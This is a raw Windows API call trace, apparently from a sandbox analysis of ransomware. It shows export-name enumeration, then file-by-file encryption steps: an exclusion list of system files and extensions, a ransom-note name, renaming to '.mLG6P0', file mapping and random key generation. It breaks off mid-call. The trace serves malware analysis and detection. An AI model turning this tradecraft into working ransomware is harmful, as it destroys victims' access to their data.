(lpString="CREATEHARDLINKW") returned 15 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.242] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.242] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.242] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.242] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.242] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.242] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.242] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.242] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.242] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.243] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.243] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.243] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.243] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.243] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.243] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.243] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.243] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.243] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.243] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.243] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.243] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.243] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.243] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.243] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.243] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.243] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.243] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.243] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.243] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.244] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.244] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.244] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.244] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.244] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.244] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.244] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.244] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.244] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.244] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.244] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.244] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.244] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.244] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.244] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.244] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.244] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.244] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.245] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.245] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.245] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.245] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.245] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.245] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.245] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.245] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.245] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.245] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.245] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.245] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.245] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.245] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.245] lstrlenA (lpString="DELETEATOM") returned 10 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.245] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.245] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.245] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.245] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.246] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.246] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.246] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.246] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.246] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.246] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.246] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.246] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.246] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.246] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.246] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.246] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.246] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.246] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.246] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.246] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.246] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.246] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.246] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.246] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.247] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.247] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.247] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.247] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.247] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.247] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.247] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.247] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.247] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.247] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.247] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.247] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.247] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.247] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.247] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.247] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.247] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.248] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.248] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.248] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.248] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf") returned 65 [0077.248] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf.mLG6P0") returned 72 [0077.248] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\khorsonbxgyfkgp.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf.mLG6P0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\khorsonbxgyfkgp.pdf.mlg6p0"), dwFlags=0x0) returned 1 [0077.249] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.249] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.249] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.249] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5565dec0, ftCreationTime.dwHighDateTime=0x1d4d487, ftLastAccessTime.dwLowDateTime=0x789079e0, ftLastAccessTime.dwHighDateTime=0x1d4c673, ftLastWriteTime.dwLowDateTime=0x789079e0, ftLastWriteTime.dwHighDateTime=0x1d4c673, nFileSizeHigh=0x0, nFileSizeLow=0x3d25, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0RHGHT3eFgSHF.m4a", cAlternateFileName="L0RHGH~1.M4A")) returned 1 [0077.249] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="autorun.inf") returned 1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="boot.ini") returned 1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="desktop.ini") returned 1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="ntuser.dat") returned -1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="iconcache.db") returned 1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="bootsect.bak") returned 1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="ntuser.dat.log") returned -1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="thumbs.db") returned -1 [0077.250] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a", lpString2="Bootfont.bin") returned 1 [0077.250] lstrlenW (lpString="L0RHGHT3eFgSHF.m4a") returned 18 [0077.250] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0077.250] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0077.250] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0077.250] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0077.250] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.250] lstrlenW (lpString="L0RHGHT3eFgSHF.m4a") returned 18 [0077.250] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.250] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="L0RHGHT3eFgSHF.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a" [0077.250] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l0rhght3efgshf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.250] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=15653) returned 1 [0077.250] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.250] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.251] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: 